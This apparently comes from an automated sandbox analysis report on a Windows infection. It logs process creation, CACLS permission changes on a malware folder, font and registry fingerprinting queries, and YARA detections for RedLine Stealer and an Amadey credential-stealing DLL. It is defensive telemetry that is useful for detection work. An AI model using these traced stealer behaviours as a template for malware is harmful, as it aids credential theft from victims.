Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\99e342142d" /P "user:N"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\99e342142d" /P "user:R" /E
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\86EE.exe	Process created: C:\Users\user\AppData\Local\Temp\86EE.exe C:\Users\user\AppData\Local\Temp\86EE.exe
Source: C:\Users\user\AppData\Local\Temp\8C00.exe	Process created: C:\Users\user\AppData\Local\Temp\8C00.exe C:\Users\user\AppData\Local\Temp\8C00.exe
Source: C:\Users\user\AppData\Local\Temp\86EE.exe	Process created: C:\Users\user\AppData\Local\Temp\86EE.exe C:\Users\user\AppData\Local\Temp\86EE.exe
Source: C:\Users\user\AppData\Local\Temp\8C00.exe	Process created: unknown unknown

Source: explorer.exe, 00000001.00000000.308527559.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.286813031.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.258274130.0000000001980000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program ManagerT7<=ge
Source: explorer.exe, 00000001.00000000.308527559.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.319633888.0000000006770000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.324125536.00000000090D8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000001.00000000.308527559.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.286813031.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.258274130.0000000001980000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000001.00000000.307075879.0000000001378000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.286195559.0000000001378000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.257831649.0000000001378000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CProgmanile
Source: explorer.exe, 00000001.00000000.308527559.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.286813031.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.258274130.0000000001980000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\AppData\Local\Temp\2B4A.exe

Code function: GetLocaleInfoA,

Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe	Queries volume information: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe	Queries volume information: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\816F.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\86EE.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\86EE.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\86EE.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\86EE.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: C:\Users\user\AppData\Local\Temp\2B4A.exe

Code function: 12_2_00412A15 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

Stealing of Sensitive Information

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 12.2.2B4A.exe.2840000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.2B4A.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.2B4A.exe.740e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.2B4A.exe.2540000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.2B4A.exe.2840000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.2B4A.exe.2540ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.2B4A.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.2B4A.exe.22ba196.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.2B4A.exe.856710.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.2B4A.exe.780000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.2B4A.exe.22ba196.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.2B4A.exe.2540ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.2B4A.exe.22bb07e.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.453D.exe.774fd8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.2B4A.exe.2540000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.453D.exe.774fd8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.2B4A.exe.22bb07e.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.2B4A.exe.856710.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000003.399248246.0000000000856000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.557498334.0000000000774000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.397792222.0000000000780000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.561654188.000000000227A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.582776721.0000000002540000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.526298773.0000000000740000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.517740314.0000000000400000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.590764503.0000000002840000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 2B4A.exe PID: 5260, type: MEMORYSTR

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 0000000F.00000002.551885520.0000000000AFF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rovwer.exe PID: 4764, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll, type: DROPPED
